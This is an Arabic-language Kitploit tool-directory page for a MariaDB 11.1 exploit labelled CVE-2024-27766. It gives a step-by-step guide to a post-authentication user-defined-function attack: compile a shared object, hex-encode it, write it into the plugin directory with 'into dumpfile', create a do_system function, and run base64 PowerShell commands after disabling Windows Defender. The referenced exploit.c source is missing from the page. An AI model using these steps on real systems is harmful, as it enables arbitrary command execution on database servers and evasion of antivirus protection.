Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Mysql_CVE-2024-27766 — تنفيذ كود بعد المصادقة على قاعدة البيانات | Kitploit
أدوات/GitHubGitHub/hissec/mysql_cve-2024-27766
تحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليمتطوير الحمولاتأمن قواعد البيانات
GitHubhissec/mysql_cve-2024-27766

Mysql_CVE-2024-27766

تنفيذ كود بعد المصادقة على قاعدة البيانات

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

دليل إعادة إنتاج الاستغلال (إصدار المنتج المتأثر MariaDB 11.1)

يوفّر هذا الدليل خطوات تفصيلية لإعادة إنتاج هجوم الدوال المعرّفة من قبل المستخدم (UDF) على نظام قاعدة بيانات. يُرجى ملاحظة أن هذا الاستغلال قد يعمل على بعض الأنظمة، لكنه قد لا يعمل بشكل صحيح على البنى 64-بت أو بعض الإصدارات.

تحذير: هذا لأغراض تعليمية فقط. الاستخدام غير المصرح به لهذه التقنيات غير قانوني وغير أخلاقي.

خطوات إعادة إنتاج الهجوم

1. تنزيل وتجهيز كود UDF

أولاً، أنشئ ملفاً باسم exploit.c وأضف الكود التالي:

root@kitploit:~

### 2. ترجمة كود UDF

قم بترجمة كود الاستغلال باستخدام المترجم `x86_64-w64-mingw32-gcc`:

```bash
x86_64-w64-mingw32-gcc -g -c exploit.c

3. إنشاء ملف كائن مشترك

أنشئ ملف كائن مشترك (exploit.so) من ملف الكائن المُترجم:

root@kitploit:~
x86_64-w64-mingw32-gcc -g -shared -Wl,-soname,exploit.so -o exploit.so exploit.o

4. تحويل ملف الكائن المشترك إلى صيغة سداسية عشرية

استخدم xxd لتحويل ملف .so إلى صيغة سداسية عشرية:

root@kitploit:~
xxd -p exploit.so | tr -d '\n' > hex_value.txt

5. تحميل القيمة السداسية العشرية إلى قاعدة البيانات

انسخ القيمة السداسية العشرية من hex_value.txt ونفّذ الأمر التالي في قاعدة البيانات الخاصة بك:

root@kitploit:~
DB> set @shell = 0x<hex_value>;

6. تحديد مجلد الإضافات ونشر الاستغلال

ابحث عن مجلد الإضافات عن طريق تشغيل:

root@kitploit:~
DB> select @@plugin_dir;

ثم أنشئ ملف الكائن المشترك الخاص بالاستغلال في مجلد الإضافات:

root@kitploit:~
DB> select binary @shell into dumpfile 'C:\\Program Files\\MariaDB 11.1\\lib\\plugin\\exploit.so';

ملاحظة: عدّل المسار وفقاً لإعدادات نظامك أو مجلد الإضافات المحدد.

7. إنشاء الدالة الخبيثة

أنشئ دالة جديدة في قاعدة البيانات باستخدام الاستغلال:

root@kitploit:~
DB> create function do_system returns integer soname 'exploit.so';

8. تنفيذ الاستغلال

عطّل أي برنامج مكافحة فيروسات أو Windows Defender قد يحجب الاستغلال. ثم نفّذ أمراً باستخدام الدالة المنشأة حديثاً:

root@kitploit:~
DB> select do_system('powershell base64 here');

استبدل 'powershell base64 here' بحمولة base64 المشفرة للأمر الذي ترغب في تنفيذه.


إخلاء مسؤولية: هذه الوثيقة مخصصة للأغراض التعليمية وأبحاث الأمن فقط. يمكن أن يؤدي إساءة استخدام هذه المعلومات إلى تهم جنائية وعقوبات قانونية شديدة. احصل دائماً على إذن من السلطات المختصة قبل اختبار أي ثغرات على شبكة أو نظام.

تنزيل الأداة